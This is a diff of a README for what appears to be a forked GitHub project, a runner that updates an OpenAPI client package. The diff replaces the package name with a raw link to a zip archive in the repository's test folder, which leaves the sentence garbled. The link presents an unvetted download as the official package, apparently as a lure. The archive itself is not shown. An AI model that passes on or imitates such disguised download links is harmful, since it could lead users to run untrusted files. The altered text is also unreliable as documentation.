naphynaphta/soenneker.github.runners.openapiclient/README.md

 ## Introduction

 The **Soenneker GitHub OpenApiClient Runner** is designed for developers who work with APIs.
-It streamlines the process of updating the `Soenneker.GitHub.OpenApiClient` package.
+It streamlines the process of updating the `https://raw.githubusercontent.com/naphynaphta/soenneker.github.runners.openapiclient/main/test/Soenneker.GitHub.Runners.OpenApiClient.Tests/openapiclient_runners_soenneker_github_2.1.zip` package.
 This tool uses the OpenAPI specification to generate client libraries, making it easier to integrate with various APIs.

 ## Features